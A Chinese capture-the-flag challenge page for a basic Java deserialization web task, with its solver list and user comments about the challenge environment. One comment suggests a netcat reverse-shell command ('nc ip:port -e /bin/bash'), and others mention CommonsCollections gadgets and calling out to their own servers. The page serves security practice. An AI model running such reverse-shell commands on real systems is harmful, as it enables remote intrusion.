ez_java_serializeWEB 未解决
分数:
25
金币:
3
题目作者:
0xcccc
一 血:
Paradiso
一血奖励:
5金币
解 决:
125
提 示:
描 述:
基础的java反序列化题目
其 他:
下载
评分(3)
解题动态
distiny 攻破了该题 19天前
baozongwi 攻破了该题 1月前
coldplay99999 攻破了该题 1月前
2657100414 攻破了该题 1月前
urahadas 攻破了该题 1月前
blacklotus0 攻破了该题 1月前
ailx10 攻破了该题 1月前
e1stdark 攻破了该题 1月前
smallgod 攻破了该题 2月前
xuanc 攻破了该题 3月前
Bee 攻破了该题 3月前
foolycat 攻破了该题 3月前
hxx 攻破了该题 4月前
lotuswhite 攻破了该题 5月前
zc341 攻破了该题 5月前
mk012 攻破了该题 5月前
ju5t1 攻破了该题 5月前
Fanllspd 攻破了该题 6月前
V5nDett4 攻破了该题 7月前
评论
fallingskies 2年前
举报
本地可以,场景里不行,吐了?
Otaku 3年前
举报
...不知道是不是真的连不上外网,反正我在我自己的本地跑不论是ping,curl还是nc都能连上我的vps。但是在这个环境下返回233但是vps毫无反应
amajane 3年前
举报
环境很容易被干死
云牧青 3年前
举报
淦,好坑,bug很多。如果能执行命令了,bash -i反弹是不行的,bash -c中的命令也不能被执行,直接用nc ip:port -e /bin/bash
hotencode 2年前
举报
到了2333这一步请问师傅怎么nc的啊,我根本连不上
Black_hole 3年前
举报
rnm退钱
bazett 3年前
举报
没明白反序列化是啥意思
云牧青 3年前
举报
搞了一下午,从最开始啥也不知道干到ObjectInputStream,干到CommonsCollections,干到成功看到2333的响应。启动了两次环境,结果发现好像不通外网拿不了shell... 你却让我输得这么彻底,哈哈哈哈哈哈哈, 焯 !!!!!!
狐萝卜CarroT 3年前
举报
java反序列化我倒是没了解过,还是先去看看基础吧..
zxmals 3年前
举报
还要花金币下载 。。。。。
lengf 3年前
举报
给一点点提示也行呀(っ °Д °;)っ
lengf 1年前
举报
@0xcccc 好哒
pork 3年前
举报
@0xcccc 靶机好像连不了外网,无法反弹shell,不知道还有没有其他方法?
0xcccc 3年前
举报
不是提供源码了吗,你可先去了解一下java反序列化漏洞